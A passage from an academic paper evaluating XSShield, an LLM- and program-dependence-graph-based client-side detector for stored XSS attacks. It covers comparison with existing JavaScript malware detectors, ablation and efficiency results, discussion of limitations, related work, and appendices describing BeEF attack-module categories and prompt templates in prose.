Malware Detectors. We selected four mainstream JavaScript malware detectors based on static analysis and machine learning to evaluate the effectiveness of obfuscation techniques. These detectors are widely used by relevant researchers [37]. We specifically selected these JavaScript malware detectors (Cujo, Zozzle, JStap) for comparison because, unlike traditional XSS defense mechanisms that require trusted server environments, these client-side detection methods can potentially function when server integrity is compromised. This aligns with our research goal of defending against stored XSS attacks in scenarios where server-side defenses have been bypassed or disabled by attackers who have gained server access. When training these detectors, benign and malicious datasets were divided into train, validation, and test sets in proportions of 60%, 20%, and 20%, respectively, as development set, with models trained strictly according to each project’s specified procedures.
Cujo [38] decomposes source code into lexical tokens and efficiently extracts these tokens from JavaScript code through custom Yacc grammar. Feature extraction is completed using Q-gram techniques, followed by classification using Support Vector Machines. In this evaluation, we used Fass et al.’s reimplementation [39] of Cujo’s static detection component.
Zozzle [40] extracts syntactic information from JavaScript’s AST, performs feature selection through correlation methods, and then uses Bayesian classifiers for data classification. This study employed Fass et al.’s reimplementation [41] of Zozzle.
JStap [42] extracts representations from code, including lexical tokens, AST, and Control Flow Graphs (CFGs). Feature extraction employs N-Gram features and node value features, followed by classification using random forest classifiers. In this evaluation, we focused on its AST abstraction and PDG abstraction, utilizing n-gram and value feature-extraction patterns. We used the official implementation [43] available on GitHub.

4.2.2. Effectiveness Evaluation

Performance of XSShield. To evaluate XSShield’s effectiveness in detecting stored XSS attacks, we conducted performance testing on the evaluation set with GPT-3.5-turbo as the base model. In this binary classification task, besides detection accuracy, we also employed Matthews Correlation Coefficient (MCC) and F1 score as evaluation metrics. MCC provides a comprehensive evaluation of model performance, while the F1 score reflects the harmonic mean of precision and recall. An ideal attack detector should have high discrimination ability and classification accuracy, with MCC and F1 scores approaching 1. The dual-metric evaluation system using MCC and F1 scores enables both comprehensive objective assessment of classifier performance on positive and negative samples and examination of its ability to reduce false positives and improve detection rates in practical applications.
Results. Table 2 presents a comprehensive performance comparison across XSShield and other detectors (columns), evaluating their detection capabilities on classified evaluation set (rows). XSShield demonstrates excellent performance across various attack scenarios. For non-obfuscated samples, the framework achieves 90.66% detection accuracy, an F1 score of 0.8991, and MCC of 0.8137, demonstrating powerful discrimination ability. In key attack categories, the framework performs particularly well: detection rates reach 93.75% for persistence and social engineering attacks, and 92.92% for vulnerability-based attacks. When facing obfuscated samples representing more complex attack variants, XSShield maintains stable performance: 72.46% detection rate, 0.7018 F1 score, and 0.5973 MCC. Although lower than for non-obfuscated samples, these results still significantly outperform existing methods in handling obfuscated attacks. Notably, the framework demonstrates robust performance in detecting obfuscated persistence attacks (71.88%) and vulnerability-based attacks (69.03%). Another outstanding advantage of XSShield is its low false positive rate, reflected in its high accuracy in identifying benign samples (97.05% for non-obfuscated and 80.00% for obfuscated samples). This characteristic is crucial for practical deployment, as high false positive rates often prevent security systems from being effectively applied in production environments. The framework’s overall performance with comprehensive MCC of 0.7055 and F1 score of 0.8005 confirms XSShield’s excellent performance in both attack detection and benign traffic recognition.
Comparison with Other Malware Detectors. To evaluate XSShield’s relative advantages, we conducted comparative analysis with other advanced malware detectors. Notably, due to JavaScript’s inherent limitations and potential complexities in code-transformation processes, certain code samples may not be correctly parsed by detectors. These samples were excluded from training data, potentially causing deviations between actual and ideal model performance for different detectors. To ensure evaluation reliability, we conducted tests on the test set, with results recorded in Table 3.
Our comparative analysis focuses exclusively on detection methods that can operate when server integrity is compromised, as XSShield is specifically designed for this threat model. Conventional XSS defenses were excluded from our comparison because they fundamentally rely on trusted server environments, which contradicts our core research assumption of defending against attacks after server compromise has occurred.
Results. Table 2 presents the recall rate comparison between XSShield and other detectors when processing attack vector scripts and benign scripts (detectors listed in columns, attacks and benign scripts in rows). After categorizing BeEF-based attack vectors, we tested each detector’s detection effectiveness on both original code and obfuscated code, calculating corresponding MCC and F1 scores.
Analysis reveals that when facing original attack implementations, all comparison group detectors performed poorly, generally misclassifying both attack and non-attack samples as benign. When processing obfuscated attacks, Cujo showed no response, while other detectors displayed limited reaction. JStap’s four variants performed inadequately; although F1 scores showed slight improvement (maximum reaching only 0.1354), considering the significant decrease in MCC (minimum of −0.1900), this improvement likely stems from obfuscation-induced bias. Zozzle performed better on obfuscated attack samples (F1 score of 0.5983) but completely failed on obfuscated non-attack samples (0% accuracy), misclassifying many obfuscated benign samples as malicious, indicating the framework’s over-reliance on obfuscation features as malicious indicators.
In contrast, XSShield was the only framework maintaining reliable detection capability across both obfuscated and non-obfuscated datasets, although its recognition rate for obfuscated samples (64.92%) still has room for improvement. This performance nevertheless demonstrates XSShield’s ability to effectively identify attack samples while maintaining accurate judgment of benign samples—a capability that becomes even more significant when considering false positive management.
This comparison reveals a critical distinction: While JStap(astvalue) achieves 97.70% benign accuracy on obfuscated samples, it fails to detect 50.98% of actual attacks, reflecting a classic precision–recall tradeoff. XSShield, by contrast, strikes a superior balance—its 80% obfuscated benign accuracy (vs. Zozzle’s catastrophic 0%) combined with 72.46% attack detection rate demonstrates practical viability in real-world deployment scenarios where both metrics are crucial.
These findings align with the broader research consensus showing that structure-based malware detectors generally fail to identify actual deployed attacks, tending to misclassify them as benign samples. Within this context, XSShield demonstrates stable and reliable performance across various test scenarios, maintaining relatively high detection accuracy and low false positive rates for both original and obfuscated attacks—a dual capability that existing detectors struggle to achieve simultaneously.

4.2.3. Ablation Experiment

Effectiveness of the Prompt Optimizer. To evaluate the effectiveness of the XSShield Prompt Optimizer module, we designed a comparative experiment testing three different prompt-selection algorithms: Non-selector: using fixed handcrafted prompts without optimization; UCB: standard Upper Confidence Bound bandits prompt selection algorithm; and UCB-R: our improved Upper Confidence Bound bandits with weighted randomization prompt-optimization algorithm.
Results. Figure 3 shows the F1 score trajectory during training. UCB-R demonstrates significant performance improvement, attributed to the introduction of randomness factors.
Table 4 shows XSShield’s detection accuracy under three configurations. Our improved UCB-R algorithm achieves 71.97% overall accuracy, demonstrating improvements of 13.61 percentage points over the baseline (58.36%) and 12.30 percentage points over the standard UCB (59.67%). The enhancement is particularly notable in malicious sample identification, where UCB-R achieves a 24.92 percentage point improvement in detection accuracy (from 43.28% to 68.20%) compared to the baseline.
These results verify our hypothesis that UCB-R can more effectively explore and exploit prompt space compared to fixed prompts or traditional UCB selection algorithms. UCB-R’s excellent performance likely benefits from its improved balance between exploration and exploitation, enabling faster identification and adoption of high-performance prompts during optimization.
Effectiveness of the Data Adaptor. To evaluate the Data Adaptor module’s impact on XSShield’s performance, we conducted a second experiment. The experiment compared system effectiveness with and without this module enabled: Data Adaptor Enabled: utilizing code segmentation based on PDG and PDG partitioning techniques; and Data Adaptor Disabled: direct code splitting by fixed length without specialized processing.
Results. Table 4 columns “Non-adaptor” (adaptor disabled) and “Adaptor” (adaptor enabled) display performance with and without the Data Adaptor module.
Effectiveness of Different pre-trained LLMs. To investigate how various pre-trained LLMs affect XSShield’s performance, we conducted comprehensive comparative analysis using three widely applied LLMs as determination models: (a) GPT-3.5-turbo, (b) GPT-4, and (c) Gemini-Pro. These models were selected for their widespread application and diverse capabilities in natural language processing, aiming to analyze how model selection influences XSShield’s overall effectiveness in detecting vectors implemented in stored XSS attacks.
Results. As shown in Table 5, different pre-trained LLMs significantly impact XSShield’s detection performance. In performance evaluation, GPT-4 achieved optimal performance with an F1 score of 0.9266; GPT-3.5-turbo followed with an F1 score of 0.9001; while Gemini-Pro performed relatively weaker with an F1 score of only 0.2112. This performance disparity highlights the significant influence of model selection on XSShield framework effectiveness. The notable performance gap between GPT series models and Gemini-Pro particularly emphasizes the necessity of careful model selection when deploying XSShield. Overall, experimental results indicate that while XSShield can achieve excellent performance when using appropriate LLMs, its effectiveness varies significantly based on model selection. This variability suggests that actual XSShield deployment requires not only comprehensive model evaluation and selection but also continued in-depth research to understand and narrow performance gaps between different language models.

4.2.4. Efficiency Evaluation

To evaluate XSShield’s performance overhead, we conducted comparative analysis of its execution time. Since prompts are pre-trained and LLM decision time is primarily influenced by network bandwidth, we denote this time portion as in the results. Table 6 compares the efficiency performance of XSShield with other detection techniques across evaluation sets.
Results. According to Table 6 data, while XSShield’s time overhead is not optimal, it remains within acceptable ranges and does not significantly impact users’ normal browsing experience. When processing non-obfuscated malicious scripts, XSShield’s performance surpasses some existing technologies and remains comparable to other similar technologies. For obfuscated malicious scripts, although XSShield’s processing time slightly increases, it still outperforms some existing technologies. Regarding average processing time per file, while XSShield is not the fastest, it remains competitive compared to mainstream technologies. Considering that actual application network latency ( ) may be small, XSShield’s practical performance may be closer to these technologies.
In summary, while XSShield’s processing time is slightly higher than some existing technologies in specific scenarios, its overall performance does not notably impact user experience. Given that XSShield provides stronger security guarantees and LLM-based flexibility, this slight performance trade-off is acceptable.

5. Discussion

5.1. Why Choose Prompt Optimization over Fine-Tuning and Retrieval-Augmented Generation?

Modern language models can be enhanced through three main approaches: fine-tuning adapts model parameters for specific tasks through additional training; Retrieval-Augmented Generation enhances model outputs by incorporating external knowledge; and prompt optimization explores semantic space through input engineering.
While fine-tuning excels in specialized tasks and can achieve state-of-the-art performance, it requires significant computational resources and frequent updates to maintain effectiveness. This makes it less ideal for dynamic security environments requiring rapid adaptation. RAG systems provide comprehensive knowledge integration but may face challenges in scenarios requiring real-time reasoning beyond their knowledge base, particularly when confronting novel security threats.
Prompt optimization offers distinct advantages in security contexts. First, it enables rapid adaptation to new threats without architectural modifications or extensive retraining. Second, its lightweight nature ensures low latency response while maintaining detection effectiveness. Third, it can be dynamically adjusted based on emerging threat patterns, making it particularly suitable for resource-constrained environments requiring real-time threat response. Empirical evidence suggests that well-designed prompts can achieve comparable performance to fine-tuned models in many security applications while significantly reducing computational overhead.

5.2. Why Is Network Latency Not a Key Bottleneck for XSShield Deployment?

XSShield currently performs inference by calling external LLM service APIs, which does introduce some network latency. However, experimental data show that the framework’s average processing time is only 0.205 s (excluding model communication overhead), having minimal impact on typical webpage-loading times. More importantly, with advances in model-compression techniques and dedicated hardware accelerators, deploying small but high-performance models locally has become feasible. This local deployment approach will completely eliminate network communication overhead, reducing end-to-end processing time to only the core computation process, thereby significantly enhancing system performance.
While XSShield’s reliance on external LLM services introduces network latency, operational costs, and dependency risks, these challenges can be mitigated through strategic design choices. Local deployment of lightweight models using model-compression techniques eliminates network communication overhead and reduces costs. Hybrid detection mechanisms combining LLMs with traditional static analysis further reduce dependency on third-party services while enhancing system resilience. Additionally, efficient prompt optimization and batching inference requests can minimize operational expenses. These approaches collectively balance performance, cost, and security, making XSShield a practical and scalable solution for real-world XSS detection.

5.3. How Does Current Large Language Model Performance Affect Obfuscated Code Detection?

Our research finds that this method achieves a 72.46% accuracy rate in detecting obfuscated JavaScript code, notably lower than the 90.66% accuracy rate for non-obfuscated code. This gap primarily stems from two aspects: first, current LLMs’ limited capability in processing highly obfuscated code; second, inadequacies in existing code behavior-representation methods. Although this detection accuracy already surpasses traditional methods, it still indicates the need to develop more advanced code-analysis techniques.
This performance limitation is expected to improve through two pathways: first, as more advanced language models develop, code-understanding capabilities will be enhanced; second, developing more effective code behavior-representation methods can more accurately capture semantic features of obfuscated code. Particularly noteworthy are recent advances in code-specific pre-training and multimodal learning domains, which provide promising research directions for improving obfuscated code-detection performance while maintaining the framework’s high detection capability for regular samples.

5.4. How Does Domain-Specific Optimization Impact Stored XSS Detection Performance?

XSShield significantly outperforms general-purpose code analysis tools (achieving 93% accuracy compared to approximately 50%), demonstrating the effectiveness of security-domain optimizations. The framework’s superior performance stems from domain-aware design choices: prompt optimization specifically engineered for XSS attack pattern recognition enables enhanced semantic understanding over traditional structure-based approaches. Moreover, the PDG adaptation mechanism, by preserving security–critical control flow relationships, yields an improvement of 14.1 percentage points in detection accuracy. Additionally, this domain-specific approach maintains robust detection capability against obfuscated samples (64.92% accuracy) where conventional detectors prove ineffective. These results demonstrate the substantial impact of security-domain optimization in enhancing foundation models’ effectiveness.

5.5. How Does UCB-R Handle Potential Dependencies Between Prompts?

A fundamental assumption in traditional UCB algorithms is the independence of trials. However, in prompt-engineering scenarios, this assumption may not strictly hold due to the semantic correlations between prompts. Specifically, prompts generated through gradient-based updates (cf. Algorithm 1) could inherit similar semantic structures, potentially leading to correlated performance patterns.
Our UCB-R algorithm incorporates several mechanisms to mitigate the impact of potential prompt dependencies. First, instead of relying on single-trial outcomes, UCB-R employs a batch-based evaluation approach where prompt performance is assessed on batched samples. The success and failure counts are updated based on aggregated scores from these batch evaluations, which helps smooth out potential correlations in individual trials. Second, the algorithm implements a dynamic exploration rate in which the exploration coefficient decreases as the number of trials increases. This adaptive exploration strategy ensures that the algorithm gradually shifts focus from exploration to exploitation as more evidence is gathered. Finally, rather than deterministically selecting prompts with the highest UCB scores, UCB-R employs a weighted random selection mechanism. This stochastic approach introduces additional randomization that can help break potential dependencies between consecutive selections.
While these mechanisms do not entirely eliminate the impact of prompt dependencies, they provide practical approaches to maintain the algorithm’s effectiveness. Future work could explore more sophisticated methods to explicitly model and account for semantic correlations between prompts, potentially through the introduction of a similarity-based regularization term in the UCB calculation.

5.5.1. Limitations

While our approach offers practical solutions to handle prompt dependencies, several theoretical and implementation challenges remain. The current approach lacks theoretical guarantees when trials exhibit dependencies, and extending the convergence analysis to correlated settings remains an open challenge. Moreover, the performance of the algorithm depends on two key hyperparameters: the batch size for evaluation and the rate of exploration coefficient decay. The optimal values for these parameters may vary significantly across different prompt spaces and task domains, necessitating careful tuning based on specific application characteristics.
Furthermore, as our framework relies on LLMs, it inherits certain intrinsic limitations. Despite LLMs’ capacity for semantic understanding and malicious behavior detection, their effectiveness is contingent on code-comprehension capabilities. The framework faces challenges including potential hallucinations, substantial computational costs, vulnerability to adversarial attacks, and false positives that may reduce system practicality. In particular, LLMs are known to be vulnerable to adversarial attacks, where slight modifications to input payloads (e.g., JavaScript code) can bypass detection mechanisms. Recent work in LLM-based security applications [44,45] has demonstrated the effectiveness of federated learning and adversarial training against model-poisoning attacks, suggesting promising directions for enhancing XSShield’s robustness. Such attacks could undermine XSShield’s effectiveness in real-world scenarios. To mitigate this risk, future work could explore the use of private, fine-tuned LLMs, adversarial training techniques, hybrid detection mechanisms combining LLMs with traditional static analysis, and continuous monitoring and updates to address emerging threats. Additionally, there exists a fundamental trade-off between input size and model comprehension—even after code slicing, code fragments may remain too extensive for the model to process effectively, potentially impeding accurate code behavior understanding.
The application of LLMs in security domains also introduces inherent risks, as carefully crafted inputs could potentially mislead models into misclassifying malicious code. Potential mitigation strategies include hybrid approaches combining traditional static analysis with LLM techniques, regular model updates to address emerging attack vectors, and implementing human verification mechanisms for high-risk scenarios.

5.5.2. Future Work

While XSShield demonstrates significant advantages in defending against stored XSS attacks, several promising research directions remain. Future work will focus on narrowing the performance gap between non-obfuscated and obfuscated attack detection through improved prompt-engineering and semantic representation techniques. To address latency concerns, we plan to explore on-device deployment of lightweight LLMs using model quantization and distillation methods. The framework could be enhanced with adaptive defense mechanisms that continuously learn from emerging attack patterns through efficient incremental prompt optimization. Integration with existing security standards like Content Security Policy would facilitate broader adoption across different platforms. Additionally, extending XSShield to provide explainable detection decisions would transform it into both a defensive tool and an educational resource for security professionals.
A critical area for future research is improving the robustness of XSShield against adversarial attacks. This includes exploring adversarial training techniques to harden the LLM against manipulated inputs, developing hybrid detection systems that combine LLMs with traditional static and dynamic analysis methods, and implementing real-time monitoring to detect and respond to adversarial payloads. Furthermore, leveraging private, fine-tuned LLMs with domain-specific adversarial examples could enhance the framework’s resilience to sophisticated attacks. These improvements would collectively strengthen XSShield’s capabilities while maintaining its lightweight nature and practical deployability in real-world environments.

6. Related Work

6.1. XSS Defense

XSS defense technology has evolved from static defense to dynamic tracking, and then to intelligent detection. Early research primarily focused on basic defense mechanisms, such as the browser-enforced embedded policies proposed by Jim et al. [46] and the Noncespaces technique proposed by Van Gundy et al. [47], the latter preventing markup injection attacks through randomized namespace prefixes.
As attack methods became more complex, research focus shifted toward more refined defense solutions. Stock et al. [48] proposed precise client-side XSS filtering technology based on dynamic data flow tracking, while Samuel et al. [49] developed context-sensitive automatic sanitization technology. Weinberger et al. [50] conducted systematic analysis of such XSS sanitization frameworks to improve their effectiveness.
Recent research has begun introducing intelligent methods, such as Melicher et al. [51] applying machine learning techniques to XSS attack detection and defense, while West et al. [52] explored client-side CSP implementation solutions. As Gupta et al. [7] pointed out in their survey, detecting complex XSS attack paths still faces significant challenges.
Reviewing existing research, most XSS defense solutions primarily focus on detecting injection-type XSS vulnerabilities (i.e., defending against vulnerability detection based on simple attack vectors) rather than directly defending against attack vectors themselves, often struggling to effectively address real-world attack methods.

6.2. Malicious JavaScript Detection

In the field of malicious JavaScript detection, researchers have proposed various detection methods. Curtsinger et al. [40] developed the Zozzle tool to identify potentially malicious scripts through static analysis of JavaScript ASTs. Rieck et al. [38] developed the CUJO system, combining static and dynamic analysis methods to detect drive-by download attacks. However, these early methods often struggled to address evasion techniques such as dynamic code generation and obfuscation.
Addressing this challenge, subsequent research made progress in multiple directions. Agten et al. [53] revealed security challenges posed by fragile JavaScript code through in-depth study of client-side sandbox mechanisms. Kolbitsch et al. [54] explored multi-execution techniques for discovering environment-dependent malware. Fass et al. further advanced the combination of static and dynamic analysis methods through developing the JaSt [55] and JStap [42] systems.
In recent years, machine learning methods have shown promising application prospects in this field. Wang et al. [56] demonstrated the effectiveness of recurrent neural networks in analyzing JavaScript execution trajectories, while Samuel et al. [57] further applied deep learning methods to analyze AST features and paragraph vectors. However, it is worth noting that relying solely on code structure analysis to determine malicious intent has fundamental limitations, as attackers can carefully design payloads that appear legitimate but are actually malicious.

6.3. Prompt Crafting

Research in prompt-learning techniques has made significant progress in the cybersecurity domain. Liu et al. constructed a comprehensive framework integrating pre-trained language models and prompt learning. Shin et al. [58] developed the AutoPrompt system, achieving automatic generation of task-specific prompts. Gao et al. [59] expanded application scenarios by combining prompt learning with few-shot learning. Schick and Schütze [60] enhanced model few-shot learning capabilities through pattern-exploitation training.
In security applications, Li et al. [61] studied prefix-tuning techniques to better adapt LLMs to specific security tasks. Brown et al. [62] demonstrated LLMs’ advantages in code understanding using advanced prompt-engineering techniques, providing important support for security analysis. Additionally, Wu et al. [63] proposed feature-extraction-enhancement schemes based on advanced prompt engineering, while Wang et al. [64] integrated systems such as LangChain and GPT-3.5-turbo for automated vulnerability detection. Although existing research has achieved important results, the application potential of prompt learning in network security analysis remains to be further explored.

7. Conclusions

This paper presents XSShield, a novel client-side framework that detects and defends against stored XSS attacks through code intent recognition. The framework combines LLMs and PDGs for JavaScript code semantic analysis, breaking through limitations of traditional differential analysis methods. Experimental results demonstrate that XSShield shows significant advantages in stored XSS attack identification compared to existing solutions. The framework adopts a semi-automated learning mechanism, enabling continuous adaptation to new attack patterns, providing a robust and sustainable solution for long-term network security protection. These research findings are expected to help the community better address the increasingly severe threat of stored XSS vulnerabilities.

Author Contributions

Data curation, Y.Z. (Yuan Zhou) and W.Y.; Formal analysis, Y.Z. (Yuan Zhou), W.G., S.Y., Y.Z. (Yibo Zhang) and W.Q.; Investigation, Y.Z. (Yuan Zhou) and E.W.; Methodology, Y.Z. (Yuan Zhou) and W.X.; Resources, Y.Z. (Yuan Zhou); Software, Y.Z. (Yuan Zhou) and W.Y.; Supervision, E.W. and W.X.; Validation, Y.Z. (Yuan Zhou); Writing—original draft, Y.Z. (Yuan Zhou); Writing—review & editing, Y.Z. (Yuan Zhou) and E.W. All authors have read and agreed to the published version of the manuscript.

Funding

This research received no external funding.

Institutional Review Board Statement

Not applicable.

Informed Consent Statement

Not applicable.

Data Availability Statement

The original contributions presented in this study are included in the article. Further inquiries can be directed to the corresponding author.

Conflicts of Interest

The authors declare no conflicts of interest.

Abbreviations

    The following abbreviations are used in this manuscript:
XSSCross Site Scripting
LLMLarge Language Model
PDGProgram Dependence Graph
ASTAbstract Syntax Tree
CFGControl Flow Graph
MCCMatthews Correlation Coefficient
CSPContent Security Policy
UCBUpper Confidence Bound Bandits
UCB-RUpper Confidence Bound Bandits with Weighted Randomization

Appendix A. Attack Vector Calssification

Information-Gathering Modules. These modules are designed to collect crucial data about the target environment, including browser fingerprints, host system details, and network configurations. Such information forms the foundation for subsequent targeted attacks and exploit customization.
Exploit Modules. This category focuses on leveraging known vulnerabilities in browsers, extensions, and systems to gain unauthorized access or execute arbitrary code. The integration with Metasploit enhances BeEF’s exploit capabilities, allowing for more sophisticated attack chains.
Mobile and Cross-Platform Modules. These modules target mobile applications developed using PhoneGap (Apache Cordova), addressing the growing importance of mobile security in the current digital landscape. They enable testing of hybrid mobile applications across different platforms.
Persistence and Social Engineering Modules. This category combines techniques for maintaining long-term access to compromised systems with methods for manipulating users into performing actions that may compromise security. These modules highlight the critical role of human factors in cybersecurity.
Auxiliary and Support Modules. These modules provide supplementary functionalities that aid in the development, testing, and customization of BeEF operations. They enhance the framework’s flexibility and support more complex attack scenarios.
Inter-Protocol Communication Modules. These modules focus on exploiting interactions between different protocols, enabling more sophisticated attack vectors that leverage the complexities of modern networked systems.

Appendix B. Prompt Template in Prompt Expander

In the Prompt Expander phase (using gradient descent method), the framework first uses initial prompts to guide the LLM in performing sequential predictions on the code in the training set (as shown in Figure A1a). By comparing prediction results with labels, the framework filters out code samples with discrepant predictions to form an error sample set. Subsequently, incorrectly predicted code examples are randomly extracted from the error sample set and combined with current prompts to serve as {{error_string}} in Figure A1b for generating error reasons. The framework then inputs these prompts and corresponding {{reasons}} into the framework shown in Figure A1c, guiding the LLM to generate improved new prompts based on these inputs. Finally, both the newly generated prompts and original prompts are input into the Prompt Selector phase.
Figure A1. Prompt templates in Prompt Expander. (a) Template for prompt evaluation. For LLM predictions, insert prompts into {{prompt}} and code into {{text}}; the LLM’s output {{predict}} will be used directly as the prediction result. (b) Template for gradient generation. For identifying error reasons in LLMs’ input and output, {{prompt}} is the currently used prompt, {{error_string}} is the code where prediction results do not match the labels; the output {{reason}} explains why the current prompt predicted this code incorrectly. (c) Template for prompt updating. For updating prompts in LLMs’ input and output, {{prompt}} is the current prompt used for prediction, {{reason}} is the reason for prediction error, {{number_of_new_prompts}} is the number of new prompts that need to be generated from this prompt; the output {{new_prompts}} represents the newly generated prompts after improving the current prompt’s errors.
Figure A1. Prompt templates in Prompt Expander. (a) Template for prompt evaluation. For LLM predictions, insert prompts into {{prompt}} and code into {{text}}; the LLM’s output {{predict}} will be used directly as the prediction result. (b) Template for gradient generation. For identifying error reasons in LLMs’ input and output, {{prompt}} is the currently used prompt, {{error_string}} is the code where prediction results do not match the labels; the output {{reason}} explains why the current prompt predicted this code incorrectly. (c) Template for prompt updating. For updating prompts in LLMs’ input and output, {{prompt}} is the current prompt used for prediction, {{reason}} is the reason for prediction error, {{number_of_new_prompts}} is the number of new prompts that need to be generated from this prompt; the output {{new_prompts}} represents the newly generated prompts after improving the current prompt’s errors.
Applsci 15 03348 g0a1aApplsci 15 03348 g0a1b

References

  1. Foundation, O. Cross-Site Scripting (XSS). 2021. Available online: https://owasp.org/www-community/attacks/xss/ (accessed on 3 December 2024).
  2. HackerOne. 8th Annual Hacker-Powered Security Report. 2024. Available online: https://hackerpoweredsecurityreport.com/ (accessed on 3 December 2024).
  3. Project, C. cvelistV5. 2023. Available online: https://github.com/CVEProject/cvelistV5/ (accessed on 3 December 2024).
  4. Database, N.V. CVE-2023-40000. 2023. Available online: https://nvd.nist.gov/vuln/detail/CVE-2023-40000/ (accessed on 3 December 2024).
  5. Bing, L.; Fengyu, Z. Study and Design of Stored-XSS Vulnerability Detection. Comput. Appl. Softw. 2013, 17–21. [Google Scholar]
  6. Somorovsky, J.; Heiderich, M.; Jensen, M.; Schwenk, J.; Gruschka, N.; Lo Iacono, L. All your clouds are belong to us: Security analysis of cloud management interfaces. In Proceedings of the 3rd ACM Workshop on Cloud Computing Security Workshop (CCSW ‘11), New York, NY, USA, 21 October 2011; pp. 3–14. [Google Scholar] [CrossRef]
  7. Gupta, S.; Gupta, B.B. Cross-Site Scripting (XSS) attacks and defense mechanisms: Classification and state-of-the-art. Int. J. Syst. Assur. Eng. Manag. 2017, 8, 512–530. [Google Scholar] [CrossRef]
  8. Barth, A.; Jackson, C.; Mitchell, J.C. Robust defenses for cross-site request forgery. In Proceedings of the 15th ACM Conference on Computer and Communications Security, Alexandria, VA, USA, 27–31 October 2008. [Google Scholar] [CrossRef]
  9. Heiderich, M.; Niemietz, M.; Schuster, F.; Holz, T.; Schwenk, J. Scriptless attacks: Stealing the pie without touching the sill. In Proceedings of the 2012 ACM Conference on Computer and Communications Security (CCS ‘12), New York, NY, USA, 16–18 October 2012; pp. 760–771. [Google Scholar] [CrossRef]
  10. Gupta, S.; Gupta, B.B. XSS-SAFE: A Server-Side Approach to Detect and Mitigate Cross-Site Scripting (XSS) Attacks in JavaScript Code. Arab. J. Sci. Eng. 2015, 41, 897–920. [Google Scholar] [CrossRef]
  11. Noever, D. Can Large Language Models Find and Fix Vulnerable Software? arXiv 2023, arXiv:2308.10345. [Google Scholar]
  12. Gupta, M.; Akiri, C.; Aryal, K.; Parker, E.; Praharaj, L. From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy. IEEE Access 2023, 11, 80218–80245. [Google Scholar] [CrossRef]
  13. Ganguli, D.; Lovitt, L.; Kernion, J.; Askell, A.; Bai, Y.; Kadavath, S.; Mann, B.; Perez, E.; Schiefer, N.; Ndousse, K.; et al. Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned. arXiv 2022, arXiv:2209.07858. [Google Scholar]
  14. Yang, W.; Dong, Y.; Li, X.; Zhang, D.; Wang, J.; Zhu, H.; Deng, Y. Security foundation of deep learning: Formalization, verification, and applications. ACM Comput. Surv. 2022, 55, 1–35. [Google Scholar] [CrossRef]
  15. Roth, S.; Gröber, L.; Backes, M.; Krombholz, K.; Stock, B. 12 Angry Developers—A Qualitative Study on Developers’ Struggles with CSP. In Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security (CCS ‘21), New York, NY, USA, 15–19 November 2021; pp. 3085–3103. [Google Scholar] [CrossRef]
  16. Xu, G.; Xie, X.; Huang, S.; Zhang, J.; Pan, L.; Lou, W.; Liang, K. JSCSP: A Novel Policy-Based XSS Defense Mechanism for Browsers. IEEE Trans. Dependable Secur. Comput. 2022, 19, 862–878. [Google Scholar] [CrossRef]
  17. Pan, X.; Cao, Y.; Liu, S.; Zhou, Y.; Chen, Y.; Zhou, T. CSPAutoGen: Black-box Enforcement of Content Security Policy upon Real-world Websites. In Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS ‘16), New York, NY, USA, 24–28 October 2016; pp. 653–665. [Google Scholar] [CrossRef]
  18. Alhindi, M.; Hallett, J. Sandboxing Adoption in Open Source Ecosystems. arXiv 2024, arXiv:2405.06447. [Google Scholar]
  19. Oren, Y.; Kemerlis, V.P.; Sethumadhavan, S.; Keromytis, A.D. The Spy in the Sandbox—Practical Cache Attacks in JavaScript. arXiv 2015, arXiv:1502.07373. [Google Scholar]
  20. Bisht, P.; Venkatakrishnan, V.N. XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks. In Detection of Intrusions and Malware, and Vulnerability Assessment; Zamboni, D., Ed.; Springer: Berlin/Heidelberg, Germany, 2008; pp. 23–43. [Google Scholar]
  21. Bates, D.; Barth, A.; Jackson, C. Regular expressions considered harmful in client-side XSS filters. In Proceedings of the 19th International Conference on World Wide Web (WWW ‘10), New York, NY, USA, 26–30 April 2010; pp. 91–100. [Google Scholar] [CrossRef]
  22. Pelizzi, R.; Sekar, R. Protection, usability and improvements in reflected XSS filters. In Proceedings of the 7th ACM Symposium on Information, Computer and Communications Security (ASIACCS ‘12), New York, NY, USA, 2–4 May 2012; p. 5. [Google Scholar] [CrossRef]
  23. Gupta, S.; Gupta, B.B. XSS-immune: A Google chrome extension-based XSS defensive framework for contemporary platforms of web applications. Sec. Commun. Netw. 2016, 9, 3966–3986. [Google Scholar] [CrossRef]
  24. Chaudhary, P.; Gupta, B.B.; Gupta, S. A Framework for Preserving the Privacy of Online Users Against XSS Worms on Online Social Network. Int. J. Inf. Technol. Web Eng. 2019, 14, 85–111. [Google Scholar] [CrossRef]
  25. Gupta, S.; Gupta, B.B.; Chaudhary, P. Hunting for DOM-Based XSS vulnerabilities in mobile cloud-based online social network. Future Gener. Comput. Syst. 2018, 79, 319–336. [Google Scholar] [CrossRef]
  26. Lalia, S.; Sarah, A. XSS Attack Detection Approach Based on Scripts Features Analysis. In Trends and Advances in Information Systems and Technologies; Rocha, Á., Adeli, H., Reis, L.P., Costanzo, S., Eds.; Springer: Cham, Switzerland, 2018; pp. 197–207. [Google Scholar]
  27. Gupta, S.; Gupta, B.B. XSS-secure as a service for the platforms of online social network-based multimedia web applications in cloud. Multimed. Tools Appl. 2018, 17, 4829–4861. [Google Scholar] [CrossRef]
  28. Aurore54F. static-pdg-js; Licensed Under AGPL-3.0. 2024. Available online: https://github.com/Aurore54F/static-pdg-js (accessed on 3 December 2024).
  29. Blondel, V.D.; Guillaume, J.L.; Lambiotte, R.; Lefebvre, E. Fast unfolding of communities in large networks. J. Stat. Mech. Theory Exp. 2008, 2008, P10008. [Google Scholar] [CrossRef]
  30. Microsoft. LMOps; Licensed Under MIT. 2024. Available online: https://github.com/microsoft/LMOps (accessed on 3 December 2024).
  31. beefproject. beef. 2024. Available online: https://github.com/beefproject/beef (accessed on 10 March 2025).
  32. JavaScript-obfuscator. 2024. Available online: https://github.com/JavaScript-obfuscator/JavaScript-obfuscator (accessed on 10 March 2025).
  33. Raychev, V.; Bielik, P.; Vechev, M.; Krause, A. Learning programs from noisy data. ACM SIGPLAN Not. 2016, 51, 61–774. [Google Scholar] [CrossRef]
  34. VirusTotal. 2024. Available online: https://www.virustotal.com/gui/home/upload (accessed on 10 March 2025).
